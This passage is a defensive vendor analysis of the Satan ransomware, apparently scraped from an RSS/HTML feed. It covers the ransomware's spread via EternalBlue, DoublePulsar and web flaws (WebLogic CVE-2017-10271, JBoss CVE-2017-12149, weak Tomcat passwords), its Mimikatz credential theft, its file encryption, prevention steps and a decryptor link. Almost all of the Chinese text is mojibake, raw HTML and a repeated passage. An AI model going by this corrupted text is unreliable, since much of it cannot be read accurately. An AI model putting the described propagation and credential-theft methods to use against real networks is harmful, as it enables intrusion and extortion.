虽然永æ’之è“å·²ç»è¿‡åŽ»å¾ˆä¹…ï¼Œä½†æ˜¯å›½å†…å¾ˆå¤šç”¨æˆ·å‡ºäºŽå„ç§åŽŸå› ä¾ç„¶æ²¡æœ‰æ‰“è¡¥ä¸ï¼Œè¿™å¯¼è‡´å¾ˆå¤šä¼ä¸šå˜åœ¨æžå¤§çš„å®‰å…¨éšæ‚£ã€‚“撒旦â€Satan勒索病毒å¯é€šè¿‡æ¼æ´žè¿›è¡Œä¼ æ’,所以ä¸ä¸‹è½½å¯ç–‘程åºå¹¶ä¸èƒ½é˜²æ¢æ„ŸæŸ“ç—…æ¯’ï¼Œå¦‚æžœä¸æ‰“è¡¥ä¸ï¼Œå³ä½¿æ²¡æœ‰ä»»ä½•æ“作åªè¦è”网就有å¯èƒ½è¢«æ”»å‡»ï¼Œå› æ¤åŠæ—¶æ›´æ–°è¡¥ä¸ï¼ŒæŽ’查webæ¼æ´žï¼Œæé«˜æœåС噍安免æ‰èƒ½æœ€å¤§é™åº¦çš„防御æ¤ç±»ç—…毒。 防范措施 Ø  æ›´æ–°æ°¸æ’ä¹‹è“æ¼æ´žè¡¥ä¸ã€‚ Ø  åŠæ—¶æ›´æ–°webæ¼æ´žè¡¥ä¸ï¼Œå‡çº§web组件。 Ø  å¼€å¯é˜²ç«å¢™å…³é—445端å£ã€‚ Ø  å®‰è£…æ€æ¯’è½¯ä»¶ä¿æŒç›‘控开å¯ã€‚ Ø  安装瑞星之剑勒索防御软件。 由于“撒旦â€Satanå‹’ç´¢ç—…æ¯’ä½¿ç”¨å¯¹ç§°åŠ å¯†ç®—æ³•åŠ å¯†ï¼Œå¯†é’¥ç¡¬ç¼–ç 在病毒程åºå’Œè¢«åŠ å¯†æ–‡ä»¶ä¸ï¼Œå› æ¤å¯ä»¥è§£å¯†ã€‚ç›®å‰ï¼Œç‘žæ˜Ÿå·²ç»å¼€å‘出了解密工具,如果用户ä¸äº†æ¤ç—…毒å¯ä¸‹è½½æ¤å·¥å…·æ¢å¤è¢«åŠ å¯†æ–‡ä»¶ï¼Œä¸‹è½½åœ°å€ï¼š http://download.rising.com.cn/for_down/satan/Satan3.x_Encrypt.exe。 解密工具使用方法 1ã€æŸ¥çœ‹å‹’ç´¢ä¿¡æ¯æ˜¯å¦å’ŒæŠ¥å‘Šä¸çš„相åŒï¼› 2ã€åˆ¤æ–è¢«åŠ å¯†æ–‡ä»¶åæ˜¯å¦ä¸º[dbger@protonmail.com]+原始文件å+.dbger,或者[satan_pro@mail.ru]+原始文件å+.satanï¼› 3ã€è¿è¡Œè§£å¯†å·¥å…·ï¼› 4ã€ç‚¹å‡»â€œæ–‡ä»¶â€æŒ‰é’®é€‰ä¸è¦è§£å¯†çš„æ–‡ä»¶å¤¹ï¼› 5ã€ç‚¹å‡»â€œè§£å¯†â€åŽï¼Œè¢«åŠ å¯†æ–‡ä»¶å°†ä¼šè¢«è§£å¯†ï¼› å¯ä»¥çœ‹åˆ°åŒç›®å½•下生æˆäº†è¢«è§£å¯†çš„æ–‡ä»¶ï¼Œä½†æ˜¯åŠ å¯†çš„æ–‡ä»¶å°†ä¼šè¢«ä¿ç•™ï¼Œç”¨æˆ·æŸ¥çœ‹ç¡®å®šæ–‡ä»¶è¢«å®Œå…¨è§£å¯†åŽï¼Œå¯åˆ é™¤è¢«åŠ å¯†æ–‡ä»¶ã€‚åœ¨ä¸ç¡®å®šè§£å¯†æ–‡ä»¶æ˜¯å¦æ£ç¡®çš„æƒ…况下,ä¸è¦è½»æ˜“åˆ é™¤è¢«åŠ å¯†æ–‡ä»¶ï¼Œé˜²æ¢å…¶å®ƒç±»åž‹ç—…毒å˜ç§åŠ å¯†çš„æ–‡ä»¶æ²¡æœ‰è¢«è§£å¯†ã€‚ 6ã€ç›®å‰æœ€æ–°ç‰ˆæœ¬å¯ä»¥è§£å¯†ï¼Œå¦‚é‡åˆ°æ¤ç—…毒的其它å˜ç§æ— 法解密,å¯è”系瑞星公å¸ã€‚ ç—…æ¯’è¯¦ç»†åˆ†æž ç—…æ¯’æ”»å‡»æµç¨‹å¦‚下: 图:病毒攻击æµç¨‹ 新版撒旦Satan勒索病毒è¿è¡ŒåŽä¼šåˆ›å»ºä¸€ä¸ªäº’斥体“SATAN_SCAN_APPâ€ï¼Œå¦‚果已ç»å˜åœ¨åˆ™é€€å‡ºã€‚ 图:创建互斥体 如果ä¸å˜åœ¨åˆ™å¼€å§‹æ‰§è¡Œæ¶æ„功能,从资æºä¸é‡Šæ”¾éœ€è¦ç”¨åˆ°çš„æ¶æ„æ¨¡å—到C:\\Users\\All Users 目录下,包括永æ’ä¹‹è“æ”»å‡»å·¥å…·ã€åŠ å¯†æ¨¡å—ã€å¯†ç 抓å–工具Mimikatz。 释放永æ’ä¹‹è“æ”»å‡»å·¥å…·ï¼Œå…¶ä¸blue.exe 是永æ’ä¹‹è“æ¼æ´žæ”»å‡»å·¥å…·ï¼Œstar.exeæ˜¯è„‰å†²åŒæ˜ŸåŽé—¨æ¤å…¥å·¥å…·ï¼Œdown64.dll æ˜¯æ¼æ´žæ”»å‡»æˆåŠŸåŽæ¤å…¥è¢«æ”»å‡»æœºå™¨çš„åŽé—¨ï¼ŒåŠŸèƒ½æ˜¯ä¸‹è½½å‹’ç´¢ç—…æ¯’æ¯ä½“,其它文件都是攻击工具需è¦ç”¨åˆ°çš„ä¾èµ–库和é…置文件。 图:释放永æ’ä¹‹è“æ”»å‡»å·¥å…· é‡Šæ”¾åŠ å¯†æ¨¡å—ï¼Œè´Ÿè´£åŠ å¯†å—害者计算机ä¸çš„æ–‡ä»¶ï¼Œé’ˆå¯¹åŠ å¯†æ¨¡å—的分æžè¯¦è§ä¸‹æ–‡â€œåŠ å¯†æ¨¡å—分æžâ€éƒ¨åˆ†ã€‚ å›¾ï¼šé‡Šæ”¾åŠ å¯†æ¨¡å— åˆ¤æ–系统架构,释放ä¸åŒç‰ˆæœ¬çš„å¯†ç æŠ“å–工具Mimikatz å¹¶è¿è¡Œï¼Œ64ä½ç³»ç»Ÿä»Žèµ„æºMINI64释放,32ä½ç³»ç»Ÿä»Žèµ„æºMINI32释放,命å为mmkt.exe。 图:释放è¿è¡Œå¯†ç 抓å–工具 å¯†ç æŠ“å–æ¨¡å—è¿è¡ŒåŽä¼šå°†æŠ“å–到的用户åä¿å˜åˆ°ç—…毒目录下的“unameâ€æ–‡ä»¶ä¸ï¼Œå¯†ç ä¿å˜åˆ°â€œupassâ€æ–‡ä»¶ä¸ã€‚è¿è¡ŒåŠ å¯†å‹’ç´¢æ¨¡å—ï¼ŒåŠ å¯†æœ¬æœºæ–‡ä»¶ã€‚ 图:è¿è¡ŒåŠ å¯†æ¨¡å— åˆ›å»ºä¸‰ä¸ªçº¿ç¨‹æ”»å‡»ç½‘ç»œä¸çš„其它机器。 图:创建线程攻击其它机器 线程1ï¼ŒèŽ·å–æœ¬æœºIP地å€ã€‚ 图:èŽ·å–æœ¬æœºIP 循环攻击本地局域网Local_IP/16,16ä½å网掩ç 的网段。例如192.168.1.1——192.168.255.255,覆盖65536å°ä¸»æœºï¼Œè€Œä¸æ˜¯ä»…仅攻击255å°ä¸»æœºï¼Œç›¸å¯¹è€Œè¨€æ”»å‡»èŒƒå›´æ›´å¹¿ã€‚ åˆ›å»ºçº¿ç¨‹ä¼ å…¥è¦æ”»å‡»çš„IP。 图:循环攻击局域网主机 åªæ”»å‡»æŒ‡å®šIPçš„445端å£ã€‚ 图:线程1åªæ”»å‡»445ç«¯å£ çº¿ç¨‹2,攻击局域网ä¸é™¤äº†445端å£ä¹‹å¤–的其它硬编ç çš„226个端å£ã€‚åˆ›å»ºçº¿ç¨‹ï¼Œä¼ å…¥æ”»å‡»IP和端å£ï¼Œä¸Žçº¿ç¨‹1ä¸åŒï¼Œçº¿ç¨‹1åªä¼ 入攻击IP,端å£å›ºå®š445。线程2在创建åçº¿ç¨‹çš„æ—¶å€™ä¼ å…¥äº†æ”»å‡»IPå’Œç«¯å£ ã€‚ 图:使用webæ¼æ´žæ”»å‡»å±€åŸŸç½‘ä¸çš„æœºå™¨ 和线程1相比,线程2å¢žåŠ äº†ä¸€ä¸ªåˆ¤æ–ï¼Œå¦‚æžœä¼ å…¥çš„ç«¯å£æ˜¯445,则执行永æ’ä¹‹è“æ¼æ´žæ”»å‡»ï¼Œå¦åˆ™æ‰§è¡Œwebæ¼æ´žæ”»å‡»ï¼Œä¸è¿‡é’ˆå¯¹445端å£çš„æ°¸æ’ä¹‹è“æ”»å‡»ä¸ä¼šç”Ÿæ•ˆï¼Œå› 为硬编ç çš„226个端å£ä¸ä¸åŒ…å«445端å£ï¼Œå³ä½¿åŒ…å«ï¼Œä¸Šå±‚函数也ä¸ä¼šä¼ 递445端å£ã€‚å› ä¸ºçº¿ç¨‹1å°±å¯ä»¥å®Œæˆå±€åŸŸç½‘çš„445ç«¯å£æ”»å‡»äº†ï¼Œæ¤å¤„å°±ä¸ç”¨å†æ”»å‡»äº†ã€‚æ¤ç—…毒旧版本的硬编ç 端å£åˆ—表ä¸åŒ…å«445端å£ã€‚新版本的端å£åˆ—è¡¨ä¿®æ”¹äº†ï¼Œä½†æ˜¯è¿™é‡Œçš„ä»£ç æ²¡æœ‰ä¿®æ”¹ï¼Œå› æ¤è¿™é‡Œçš„åˆ¤æ–æ˜¾å¾—有些多余。 图:判æ–ç«¯å£æ‰§è¡Œæ”»å‡» æ¤å¤–在执行web攻击之å‰ä¼šè®¾ç½®ä¸€ä¸ªæ ‡å¿—ä½ï¼Œå¦‚æžœç«¯å£æ˜¯443或8443åˆ™å°†æ ‡å¿—ä½è®¾ç½®ä¸º1,目的是拼凑攻击报文时,区分http还是https。httpsæœåŠ¡é»˜è®¤443端å£ï¼Œtomcatçš„httpsæœåŠ¡éœ€è¦8443端å£ã€‚ 图:拼凑攻击报文 之所以没有固定端å£ï¼Œå¯¹åŒä¸€ä¸ªIP使用ä¸åŒçš„端å£å¾ªçŽ¯æ”»å‡»226æ¬¡ï¼Œæ˜¯å› ä¸ºç½‘ç»œä¸æœ‰äº›æœºå™¨æ²¡æœ‰æ‰“è¡¥ä¸ï¼Œä½†æ˜¯ä¼šå°†å„ç§webæœåŠ¡çš„é»˜è®¤ç«¯å£å·ä¿®æ”¹ä¸ºå…¶å®ƒç«¯å£å·ï¼Œä½œä¸ºæ¼æ´žç¼“è§£æŽªæ–½ã€‚æ”»å‡»è€…é€šè¿‡è¿™ç§æ–¹å¼ç»•过缓解措施。这也为我们æäº†ä¸ªé†’,缓解措施很有å¯èƒ½è¢«ç»•è¿‡ï¼ŒæŠŠæ¼æ´žå½»åº•ä¿®å¤æ‰èƒ½æ›´å¤§é™åº¦çš„é¿å…被攻击。 硬编ç 的内置端å£åˆ—表: 图:硬编ç 的攻击端å£åˆ—表 线程3和线程2çš„åŒºåˆ«ä¸»è¦æ˜¯çº¿ç¨‹2攻击的是局域网IP,线程3攻击的是内置的互è”网IP,病毒内置了大é‡çš„IPæ®µï¼Œå¾ªçŽ¯éšæœºé€‰å–攻击。 图:循环攻击内置的IP段 从内置的硬编ç çš„IPä¸ï¼Œéšæœºé€‰å–å°†è¦æ”»å‡»çš„IPåœ°å€æ®µã€‚ å›¾ï¼šéšæœºé€‰å– 线程3的攻击函数和线程2相åŒï¼Œæ”»å‡»æ¯ä¸ªIP时,都会循环攻击硬编ç çš„226个端å£ï¼ŒåŒæ ·ç”±äºŽå†…置的编ç 表ä¸ä¸å«æœ‰445端å£ï¼Œæ”»å‡»äº’è”ç½‘çš„çº¿ç¨‹ä¹Ÿæ— æ³•å¯¹445端å£å‘èµ·æ°¸æ’ä¹‹è“æ”»å‡»ï¼Œåªä¼šå‘指定的IPå‘èµ·web攻击。 图:循环攻击指定的IPç«¯å£ å›¾ï¼šåˆ¤æ–ç«¯å£æ‰§è¡Œæ”»å‡» æ°¸æ’ä¹‹è“æ”»å‡»ï¼Œæ¼æ´žè§¦å‘åŽä¼šå°†down64.dllæ¤å…¥åˆ°è¢«æ”»å‡»æœºå™¨ã€‚ 图:永æ’ä¹‹è“æ”»å‡»   down64.dll的功能是è”网下载è¿è¡Œç—…毒æ¯ä½“ï¼Œè¢«æ”»å‡»æœºå™¨ä¸æ¯’åŽï¼Œåˆä¼šå¾ªçŽ¯åŒæ ·çš„æ“ä½œï¼ŒåŠ å¯†æœ¬æœºæ–‡ä»¶å‹’ç´¢ï¼Œæ”»å‡»å…¶å®ƒæœºå™¨ã€‚ webæ”»å‡»åˆ©ç”¨äº†å¤šç§æ¼æ´žï¼Œæ–‡ä»¶ä¸Šä¼ æ¼æ´žã€‚ å›¾ï¼šæ–‡ä»¶ä¸Šä¼ æ¼æ´ž tomcatå¼±å£ä»¤æ”»å‡»ã€‚ 图:tomcatå¼±å£ä»¤æ¼æ´ž CVE-2017-10271  WebLogic WLSç»„ä»¶æ¼æ´žã€‚ 图:WebLogic WLSç»„ä»¶æ¼æ´ž CVE-2017-12149  JBOOS ååºåˆ—åŒ–æ¼æ´žã€‚ 图:JBOOS ååºåˆ—åŒ–æ¼æ´ž åŠ å¯†æ¨¡å—分æžï¼ŒSatan勒索病毒主è¦é’ˆå¯¹æ•°æ®æ–‡ä»¶è¿›è¡ŒåŠ å¯†ï¼ŒåŠ å¯†åŽè¿½åŠ æ–‡ä»¶åŽç¼€ä¸ºâ€œ.dbgerâ€ã€‚ å›¾ï¼šè¢«åŠ å¯†æ–‡ä»¶çš„çŽ°è±¡ 勒索模å—è¿è¡ŒåŽï¼Œå°è¯•对所有驱动器é历文件,排除以下目录: 表:病毒排除的目录 图:病毒ä¸åŠ å¯†çš„ç›®å½• 当为如下åŽç¼€æ—¶ï¼Œä¸ä¼šåŠ å¯†ï¼š è¡¨æ ¼ï¼šç—…æ¯’æŽ’é™¤çš„åŽç¼€ 图:病毒ä¸åŠ å¯†çš„æ–‡ä»¶ç±»åž‹ ç„¶åŽåˆ›å»ºçº¿ç¨‹å¯¹éåŽ†åˆ°çš„æ–‡ä»¶è¿›è¡ŒåŠ å¯†ï¼Œç—…æ¯’è¿˜ä¼šå°è¯•å…³é—SQL相关æœåŠ¡é˜²æ¢æ–‡ä»¶è¢«å ç”¨æ— æ³•åŠ å¯†ã€‚ 图:关é—SQLæœåŠ¡ […]]]></description>
602 <content:encoded><![CDATA[<p><b style="color: rgb(0, 176, 80);">近日,瑞星å¨èƒæƒ…报平å°å‘现多起国内用户感染“撒旦â€Satan勒索病毒事件。æ®ç‘žæ˜Ÿå®‰å…¨ç ”究人员介ç»ï¼Œè¯¥ç—…毒è¿è¡ŒåŽä¼šåР坆å—å®³è€…è®¡ç®—æœºæ–‡ä»¶ï¼ŒåŠ å¯†å®ŒæˆåŽä¼šç”¨ä¸è‹±éŸ©ä¸‰å›½è¯è¨€ç´¢å–1个比特å¸ä½œä¸ºèµŽé‡‘,并å¨èƒä¸‰å¤©å†…䏿”¯ä»˜å°†ä¸äºˆè§£å¯†ã€‚与以往常è§çš„勒索病毒ä¸åŒï¼Œâ€œæ’’æ—¦â€ä¸ä»…ä¼šå¯¹æ„ŸæŸ“ç—…æ¯’çš„ç”µè„‘ä¸‹æ‰‹ï¼ŒåŒæ—¶ç—…æ¯’è¿˜ä¼šåˆ©ç”¨å¤šä¸ªæ¼æ´žç»§ç»æ”»å‡»å…¶å®ƒç”µè„‘。</b></p>
603<p><img alt="image001.png" src="http://image.3001.net/images/20180720/15320541214800.png!small" width="682" height="512"></p>
604<p style="text-align: center;">图:感染“撒旦â€ç—…毒åŽå¼¹å‡ºçš„勒索窗å£</p>
605<p>ç‘žæ˜Ÿå®‰å…¨ç ”ç©¶äººå‘˜å¯¹æœ€æ–°ç‰ˆæœ¬çš„â€œæ’’æ—¦â€Satan勒索病毒进行了分æžï¼Œå‘现该病毒与以往勒索病毒有较大的ä¸åŒï¼Œâ€œæ’’æ—¦â€Satan勒索病毒ä¸ä»…使用永æ’ä¹‹è“æ¼æ´žæ”»å‡»ï¼Œè¿˜å¢žåŠ äº†å…¶å®ƒçš„æ¼æ´žæ”»å‡»ã€‚åŒ…æ‹¬æ–‡ä»¶ä¸Šä¼ æ¼æ´žã€tomcatå¼±å£ä»¤æ¼æ´žã€WebLogic WLSç»„ä»¶æ¼æ´žã€JBOOS ååºåˆ—åŒ–æ¼æ´žç‰ã€‚</p>
606<p>虽然永æ’之è“å·²ç»è¿‡åŽ»å¾ˆä¹…ï¼Œä½†æ˜¯å›½å†…å¾ˆå¤šç”¨æˆ·å‡ºäºŽå„ç§åŽŸå› ä¾ç„¶æ²¡æœ‰æ‰“è¡¥ä¸ï¼Œè¿™å¯¼è‡´å¾ˆå¤šä¼ä¸šå˜åœ¨æžå¤§çš„å®‰å…¨éšæ‚£ã€‚“撒旦â€Satan勒索病毒å¯é€šè¿‡æ¼æ´žè¿›è¡Œä¼ æ’,所以ä¸ä¸‹è½½å¯ç–‘程åºå¹¶ä¸èƒ½é˜²æ¢æ„ŸæŸ“ç—…æ¯’ï¼Œå¦‚æžœä¸æ‰“è¡¥ä¸ï¼Œå³ä½¿æ²¡æœ‰ä»»ä½•æ“作åªè¦è”网就有å¯èƒ½è¢«æ”»å‡»ï¼Œå› æ¤åŠæ—¶æ›´æ–°è¡¥ä¸ï¼ŒæŽ’查webæ¼æ´žï¼Œæé«˜æœåС噍安免æ‰èƒ½æœ€å¤§é™åº¦çš„防御æ¤ç±»ç—…毒。</p>
607<h3><b>防范措施</b></h3>
608<blockquote><p>Ø æ›´æ–°æ°¸æ’ä¹‹è“æ¼æ´žè¡¥ä¸ã€‚</p>
609<p>Ø åŠæ—¶æ›´æ–°webæ¼æ´žè¡¥ä¸ï¼Œå‡çº§web组件。</p>
610<p>Ø å¼€å¯é˜²ç«å¢™å…³é—445端å£ã€‚</p>
611<p>Ø å®‰è£…æ€æ¯’è½¯ä»¶ä¿æŒç›‘控开å¯ã€‚</p>
612<p>Ø 安装瑞星之剑勒索防御软件。</p>
613</blockquote>
614<p>由于“撒旦â€Satanå‹’ç´¢ç—…æ¯’ä½¿ç”¨å¯¹ç§°åŠ å¯†ç®—æ³•åŠ å¯†ï¼Œå¯†é’¥ç¡¬ç¼–ç 在病毒程åºå’Œè¢«åŠ å¯†æ–‡ä»¶ä¸ï¼Œå› æ¤å¯ä»¥è§£å¯†ã€‚ç›®å‰ï¼Œç‘žæ˜Ÿå·²ç»å¼€å‘出了解密工具,如果用户ä¸äº†æ¤ç—…毒å¯ä¸‹è½½æ¤å·¥å…·æ¢å¤è¢«åŠ å¯†æ–‡ä»¶ï¼Œä¸‹è½½åœ°å€ï¼š</p>
615<p><a href="http://download.rising.com.cn/for_down/satan/Satan3.x_Encrypt.exe">http://download.rising.com.cn/for_down/satan/Satan3.x_Encrypt.exe</a>。</p>
616<h3><b>解密工具使用方法</b></h3>
617<p>1ã€æŸ¥çœ‹å‹’ç´¢ä¿¡æ¯æ˜¯å¦å’ŒæŠ¥å‘Šä¸çš„相åŒï¼›</p>
618<p>2ã€åˆ¤æ–è¢«åŠ å¯†æ–‡ä»¶åæ˜¯å¦ä¸º[dbger@protonmail.com]+原始文件å+.dbger,或者[satan_pro@mail.ru]+原始文件å+.satanï¼›</p>
619<p>3ã€è¿è¡Œè§£å¯†å·¥å…·ï¼›</p>
620<p>4ã€ç‚¹å‡»â€œæ–‡ä»¶â€æŒ‰é’®é€‰ä¸è¦è§£å¯†çš„æ–‡ä»¶å¤¹ï¼›</p>
621<p><img alt="image005.png" src="http://image.3001.net/images/20180720/15320542327520.png!small" width="458" height="150"></p>
622<p>5ã€ç‚¹å‡»â€œè§£å¯†â€åŽï¼Œè¢«åŠ å¯†æ–‡ä»¶å°†ä¼šè¢«è§£å¯†ï¼›</p>
623<p><img alt="image007.png" src="http://image.3001.net/images/20180720/15320542559831.png!small" width="456" height="150"></p>
624<p>å¯ä»¥çœ‹åˆ°åŒç›®å½•下生æˆäº†è¢«è§£å¯†çš„æ–‡ä»¶ï¼Œä½†æ˜¯åŠ å¯†çš„æ–‡ä»¶å°†ä¼šè¢«ä¿ç•™ï¼Œç”¨æˆ·æŸ¥çœ‹ç¡®å®šæ–‡ä»¶è¢«å®Œå…¨è§£å¯†åŽï¼Œå¯åˆ é™¤è¢«åŠ å¯†æ–‡ä»¶ã€‚åœ¨ä¸ç¡®å®šè§£å¯†æ–‡ä»¶æ˜¯å¦æ£ç¡®çš„æƒ…况下,ä¸è¦è½»æ˜“åˆ é™¤è¢«åŠ å¯†æ–‡ä»¶ï¼Œé˜²æ¢å…¶å®ƒç±»åž‹ç—…毒å˜ç§åŠ å¯†çš„æ–‡ä»¶æ²¡æœ‰è¢«è§£å¯†ã€‚</p>
625<p><img alt="image009.png" src="http://image.3001.net/images/20180720/15320542865530.png!small" width="515" height="279"></p>
626<p><img alt="image011.png" src="http://image.3001.net/images/20180720/15320543029693.png!small" width="548" height="307"></p>
627<p>6ã€ç›®å‰æœ€æ–°ç‰ˆæœ¬å¯ä»¥è§£å¯†ï¼Œå¦‚é‡åˆ°æ¤ç—…毒的其它å˜ç§æ— 法解密,å¯è”系瑞星公å¸ã€‚</p>
628<h2><b>病毒详细分æž</b></h2>
629<p>病毒攻击æµç¨‹å¦‚下:</p>
630<p><img alt="image013.png" src="http://image.3001.net/images/20180720/15320543255449.png!small" width="690" height="630"></p>
631<p style="text-align: center;">图:病毒攻击æµç¨‹</p>
632<p>新版撒旦Satan勒索病毒è¿è¡ŒåŽä¼šåˆ›å»ºä¸€ä¸ªäº’斥体“SATAN_SCAN_APPâ€ï¼Œå¦‚果已ç»å˜åœ¨åˆ™é€€å‡ºã€‚</p>
633<p><img alt="image015.png" src="http://image.3001.net/images/20180720/1532054343362.png!small" width="679" height="459"></p>
634<p style="text-align: center;">图:创建互斥体</p>
635<p>如果ä¸å˜åœ¨åˆ™å¼€å§‹æ‰§è¡Œæ¶æ„功能,从资æºä¸é‡Šæ”¾éœ€è¦ç”¨åˆ°çš„æ¶æ„æ¨¡å—到C:\\Users\\All Users 目录下,包括永æ’ä¹‹è“æ”»å‡»å·¥å…·ã€åŠ å¯†æ¨¡å—ã€å¯†ç 抓å–工具Mimikatz。</p>
636<p>释放永æ’ä¹‹è“æ”»å‡»å·¥å…·ï¼Œå…¶ä¸blue.exe 是永æ’ä¹‹è“æ¼æ´žæ”»å‡»å·¥å…·ï¼Œstar.exeæ˜¯è„‰å†²åŒæ˜ŸåŽé—¨æ¤å…¥å·¥å…·ï¼Œdown64.dll æ˜¯æ¼æ´žæ”»å‡»æˆåŠŸåŽæ¤å…¥è¢«æ”»å‡»æœºå™¨çš„åŽé—¨ï¼ŒåŠŸèƒ½æ˜¯ä¸‹è½½å‹’ç´¢ç—…æ¯’æ¯ä½“,其它文件都是攻击工具需è¦ç”¨åˆ°çš„ä¾èµ–库和é…置文件。</p>
637<p><img alt="image017.png" src="http://image.3001.net/images/20180720/15320545623834.png!small" width="690" height="140"><img alt="image019.png" src="http://image.3001.net/images/20180720/15320545623092.png!small" width="690" height="125"><img alt="image021.png" src="http://image.3001.net/images/20180720/15320545625059.png!small" width="690" height="125"><img alt="image023.png" src="http://image.3001.net/images/20180720/15320545624728.png!small" width="690" height="122"><img alt="image025.png" src="http://image.3001.net/images/20180720/15320545626935.png!small" width="690" height="123"><img alt="image027.png" src="http://image.3001.net/images/20180720/1532054563100.png!small" width="690" height="121"><img alt="image029.png" src="http://image.3001.net/images/20180720/15320545638295.png!small" width="690" height="122"><img alt="image031.png" src="http://image.3001.net/images/20180720/15320545639637.png!small" width="690" height="137"><img alt="image033.png" src="http://image.3001.net/images/20180720/15320545632150.png!small" width="690" height="137"><img alt="image035.png" src="http://image.3001.net/images/20180720/15320545639030.png!small" width="690" height="136"><img alt="image037.png" src="http://image.3001.net/images/20180720/153205456387.png!small" width="690" height="135"><img alt="image039.png" src="http://image.3001.net/images/20180720/15320545643175.png!small" width="690" height="122"><img alt="image041.png" src="http://image.3001.net/images/20180720/15320545646960.png!small" width="690" height="121"><img alt="image043.png" src="http://image.3001.net/images/20180720/15320545643899.png!small" width="690" height="124"><img alt="image045.png" src="http://image.3001.net/images/20180720/15320545649785.png!small" width="690" height="123"><img alt="image047.png" src="http://image.3001.net/images/20180720/15320545653393.png!small" width="690" height="124"><img alt="image049.png" src="http://image.3001.net/images/20180720/15320545659578.png!small" width="690" height="121"><img alt="image051.png" src="http://image.3001.net/images/20180720/15320545658019.png!small" width="690" height="136"><img alt="image053.png" src="http://image.3001.net/images/20180720/15320545662235.png!small" width="690" height="135"><img alt="image055.png" src="http://image.3001.net/images/20180720/15320545661509.png!small" width="690" height="135"><img alt="image057.png" src="http://image.3001.net/images/20180720/15320545665865.png!small" width="690" height="139"><img alt="image059.png" src="http://image.3001.net/images/20180720/15320545668256.png!small" width="690" height="136"><img alt="image061.png" src="http://image.3001.net/images/20180720/15320545676398.png!small" width="690" height="137"></p>
638<p style="text-align: center;">图:释放永æ’ä¹‹è“æ”»å‡»å·¥å…·</p>
639<p>é‡Šæ”¾åŠ å¯†æ¨¡å—ï¼Œè´Ÿè´£åŠ å¯†å—害者计算机ä¸çš„æ–‡ä»¶ï¼Œé’ˆå¯¹åŠ å¯†æ¨¡å—的分æžè¯¦è§ä¸‹æ–‡â€œåŠ å¯†æ¨¡å—分æžâ€éƒ¨åˆ†ã€‚</p>
640<p><img alt="image063.png" src="http://image.3001.net/images/20180720/15320545943876.png!small" width="690" height="197"></p>
641<p style="text-align: center;">å›¾ï¼šé‡Šæ”¾åŠ å¯†æ¨¡å—</p>
642<p>判æ–系统架构,释放ä¸åŒç‰ˆæœ¬çš„å¯†ç æŠ“å–工具Mimikatz å¹¶è¿è¡Œï¼Œ64ä½ç³»ç»Ÿä»Žèµ„æºMINI64释放,32ä½ç³»ç»Ÿä»Žèµ„æºMINI32释放,命å为mmkt.exe。</p>
643<p><img alt="image065.png" src="http://image.3001.net/images/20180720/15320546573984.png!small" width="690" height="329"></p>
644<p style="text-align: center;">图:释放è¿è¡Œå¯†ç 抓å–工具</p>
645<p>å¯†ç æŠ“å–æ¨¡å—è¿è¡ŒåŽä¼šå°†æŠ“å–到的用户åä¿å˜åˆ°ç—…毒目录下的“unameâ€æ–‡ä»¶ä¸ï¼Œå¯†ç ä¿å˜åˆ°â€œupassâ€æ–‡ä»¶ä¸ã€‚è¿è¡ŒåŠ å¯†å‹’ç´¢æ¨¡å—ï¼ŒåŠ å¯†æœ¬æœºæ–‡ä»¶ã€‚</p>
646<p><img alt="image067.png" src="http://image.3001.net/images/20180720/15320546985184.png!small" width="436" height="88"></p>
647<p style="text-align: center;">图:è¿è¡ŒåŠ å¯†æ¨¡å—</p>
648<p>创建三个线程攻击网络ä¸çš„其它机器。</p>
649<p><img alt="image069.png" src="http://image.3001.net/images/20180720/15320547388850.png!small" width="502" height="574"></p>
650<p style="text-align: center;">图:创建线程攻击其它机器</p>
651<p>线程1ï¼ŒèŽ·å–æœ¬æœºIP地å€ã€‚</p>
652<p><img alt="image071.png" src="http://image.3001.net/images/20180720/15320547844536.png!small" width="472" height="353"></p>
653<p style="text-align: center;">图:èŽ·å–æœ¬æœºIP</p>
654<p>循环攻击本地局域网Local_IP/16,16ä½å网掩ç 的网段。例如192.168.1.1——192.168.255.255,覆盖65536å°ä¸»æœºï¼Œè€Œä¸æ˜¯ä»…仅攻击255å°ä¸»æœºï¼Œç›¸å¯¹è€Œè¨€æ”»å‡»èŒƒå›´æ›´å¹¿ã€‚</p>
655<p>åˆ›å»ºçº¿ç¨‹ä¼ å…¥è¦æ”»å‡»çš„IP。</p>
656<p><img alt="image073.png" src="http://image.3001.net/images/20180720/15320549149254.png!small" width="596" height="505"><img alt="image075.png" src="http://image.3001.net/images/20180720/15320549147623.png!small" width="616" height="174"></p>
657<p style="text-align: center;">图:循环攻击局域网主机</p>
658<p>åªæ”»å‡»æŒ‡å®šIPçš„445端å£ã€‚</p>
659<p><img alt="image077.png" src="http://image.3001.net/images/20180720/15320549751303.png!small" width="690" height="355"></p>
660<p style="text-align: center;">图:线程1åªæ”»å‡»445端å£</p>
661<p>线程2,攻击局域网ä¸é™¤äº†445端å£ä¹‹å¤–的其它硬编ç çš„226个端å£ã€‚åˆ›å»ºçº¿ç¨‹ï¼Œä¼ å…¥æ”»å‡»IP和端å£ï¼Œä¸Žçº¿ç¨‹1ä¸åŒï¼Œçº¿ç¨‹1åªä¼ 入攻击IP,端å£å›ºå®š445。线程2在创建åçº¿ç¨‹çš„æ—¶å€™ä¼ å…¥äº†æ”»å‡»IPå’Œç«¯å£ ã€‚</p>
662<p><img alt="image079.png" src="http://image.3001.net/images/20180720/15320550162338.png!small" width="675" height="551"></p>
663<p style="text-align: center;">图:使用webæ¼æ´žæ”»å‡»å±€åŸŸç½‘ä¸çš„æœºå™¨</p>
